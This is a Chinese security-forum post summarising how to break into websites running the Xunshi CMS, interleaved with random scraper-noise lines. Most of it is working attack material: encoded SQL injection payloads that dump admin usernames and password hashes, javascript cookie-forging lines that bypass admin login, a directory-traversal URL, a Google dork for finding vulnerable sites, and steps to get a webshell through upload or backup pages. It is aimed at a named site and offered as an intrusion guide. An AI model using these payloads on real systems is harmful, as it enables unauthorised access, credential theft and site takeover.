中国网络渗透测试联盟
标题:
讯时漏洞总结
[打印本页]
作者:
admin
时间:
2013-1-16 21:25
标题:
讯时漏洞总结
by:血封忆尘
8 L. c% g: n6 h( G* \
! F F. m; c+ C5 e: l
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
: g" ], @4 i! k, P" V' G
9 u) a9 _6 Y' c! F9 r! p
以下本文总结来自黑防去年第9期杂志上的内容...
, o) s/ ]2 _ D2 T- |+ @
- C; ]# U# E. w) H9 y
先说一个注入吧:
http://www.political-security.com/news_more.asp?lm=2
%41nd 1=2 union %53elect 1,2,3,0x3b%
+ j2 G: B8 B# _& }
9 W# L0 K/ d" n( r0 e. i
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
- [+ k" @! m9 | g# U$ _* T
/ W8 e( _: h6 f
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
. ]5 X7 c9 R6 m+ |, Z8 S, z
这里一个注入
/ S7 ]1 V/ f1 l, r5 Z) K
: H5 x5 Q: H3 \5 {% J
效果如图:
6 ^/ ~% p, ]* N5 C. O. X
9 J1 I2 O) v' ]7 a! N( c2 i+ o
- _8 d) x: T7 P; d3 H8 Q! q
4 R" Q6 I4 K: U' Y: N
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
2 T9 U9 m7 e- Z! H1 b3 L( D
) l4 {7 J* o! A' [! a6 L+ r4 `# g
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
/ {1 j# n" V2 O2 j, h; r- w1 @
( |2 L# ]$ b, m! i% x+ C, n
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
, u- V. | r# O% s
( T1 a; q% m- n+ X8 \5 ~0 T- {! ?$ w
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
, A7 p1 l8 ?$ N0 i; k
* a; |7 Y& d- D
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
7 _ T" q9 G8 E1 [7 t! v8 n
5 m. A0 j: n+ E0 L' \4 V
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
3 o/ ]- w2 L, W I$ C; _; d
+ U9 a6 b+ R) C
访问这页面来列目录..步骤如下:
" K `' T h% c* }8 K8 ?
/ B2 S& C$ p D
javascript:alert(document.cookie="admindj=1")
8 R- L2 `7 M }/ T
6 x( D2 S9 L) e/ x8 j8 Z
http://www.political-security.co ... asp?id=46&dir=../..
) h! r/ ~; w0 E
! X$ _; G' v' K. |/ C
效果如图:
* D) v# q5 W/ o& f* i6 k, p! |
( ^+ K1 o' K* S2 ^0 A
% c5 n1 D% @0 b
. ]4 T! A8 F+ F, Q( E% I
这样全站目录都能瞧了..找到后台目录..进去..
w& M; P! `7 o* F' G7 [4 @" ^" V7 x
/ S' @6 x) Y/ L! }- l3 f
那么进了后台怎么拿shell??上传--备份就ok了..
: g/ C9 t4 P5 C" Z8 `
0 a/ n P# l# }4 h
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
# p" p+ ]6 r8 P# E+ } o
0 t2 v8 B+ t8 p3 d6 _+ x" K$ ~1 B
这个我也碰到过一次..你都可以通过列目录来实现..
9 R% r3 e- m; ~
! L0 l5 V- O) F
javascript:alert(document.cookie="admindj=1")
+ u% b4 u* ^$ L, p1 T& |9 g; d
/ H% D i, a9 t! A
http://www.political-security.co ... p?action=BackupData
3 K0 [% n" x; Z
& M) S4 X0 M8 s4 J6 ^$ {: v
备份ok..
& N" a9 q; J7 \* ~
3 X5 W# V8 W: \7 ~7 R/ g
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
; S' E$ x4 r6 K3 \5 q( Y, o3 u
% o. Z9 l( ~) x9 X0 O, ^% V
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
3 S; d) H. [2 v, F
% p) @9 i# v! F& Y. O
然后访问此页面进行注入..步骤如下:
/ w0 J( c/ j* A( g/ g$ [
& P$ D) @4 v( ? p5 M7 q$ w
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
) n7 ]% [6 C$ t( s$ W/ x
u- i7 w1 v/ }
然后请求admin/admin_chk.asp页面
4 P2 o) D1 I4 \' I/ Y0 w$ r! j9 o- k
& c2 ]$ C- B& _7 [3 o
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
+ p; P5 @3 m. u, a7 X
- Z6 q$ h. I! B
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
/ \) y" r, O& f
, S f2 }- J0 B6 ]0 D0 m9 @
效果如图所示:
0 Z# a5 U1 n. ]4 s5 ~
; k+ ]' s1 F8 Q0 j2 o2 _
: n0 b" i0 Z9 b& A9 q7 N1 W
/ T; L, {! J4 `% Q
讯时漏洞2
+ c6 ~1 e3 S. D* x# s' B- N
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
5 o2 u$ ~+ c2 _- v Q5 a, U! Q
1 g1 N; m0 _" } R* j9 i
1、/admin/admin_news_pl_view.asp?id=1
# n, O0 ^6 t9 w
//id任意 填入以下语句
+ H9 c" e4 `, U- L }( A* |) h C: Y. v
& _, }; ^, f! |+ X! {4 E8 L. C
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
# c- c( `: w" p5 m& u) R
& U0 H N0 N% _1 Y! l
1 K" D) h% S9 y/ p3 K# R; [6 E
q5 A6 ]8 b5 j
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
" k( K0 E7 m5 u# P! Z; c* D
; g# R1 |; N2 m, m
, l) T" [ Z( u9 @9 z
4 V6 _5 ^! z2 x) J- d
爆出管理员帐号和密码了
' G1 {, c+ D5 A8 q7 K: q/ ?2 s
% _( a. l) C! u& r, p7 I# }9 g
4 G* ]1 |( d: E* t$ ~
1 N( T" X$ D8 ]! y; c
4、cookies进后台
' s7 ^( U7 W( ?- C* u
3 f Q9 Z9 C9 B& e3 F& r5 f F% E
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
W! P, e' k4 p
* h7 D$ T) q& C2 D" F* B _0 Y0 H9 S
, ]% R4 V; m/ t( T9 ]; m
3 r( t G" e3 n
5、后台用了cookie验证,直接访问
http://www.political-security.com/admin/admin_index.asp
就OK了!
- Z4 F& o, L* G7 P# K5 ^2 Y
- f9 {) {1 t4 ?7 x! e b) [/ k
. ~2 q1 |* h; a# K a' I k
* K% Z5 N- o/ |- p
6、后台有上传和备份取SHELL不难。
! Y. f% l' p1 R2 n; y$ x, a$ S
% q5 V8 E6 T8 X) |. B( v
7、讯时还有个列目录漏洞:
http://www.political-security.co ... asp?id=46&dir=../..
4 U" r/ k# C$ ?5 z! P2 I5 r
* |! Q! c4 R/ R+ u4 M& B7 h9 X
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问
http://www.political-security.com
/admin/admin_db_backup.asp?action=BackupData
,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
8 E- H6 w5 n1 ^" r
2 T% A: }8 O# W+ e% ~
4 \- j' d; H# y7 N
! C' b2 Q! b! d* }+ w& u5 ?' _
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2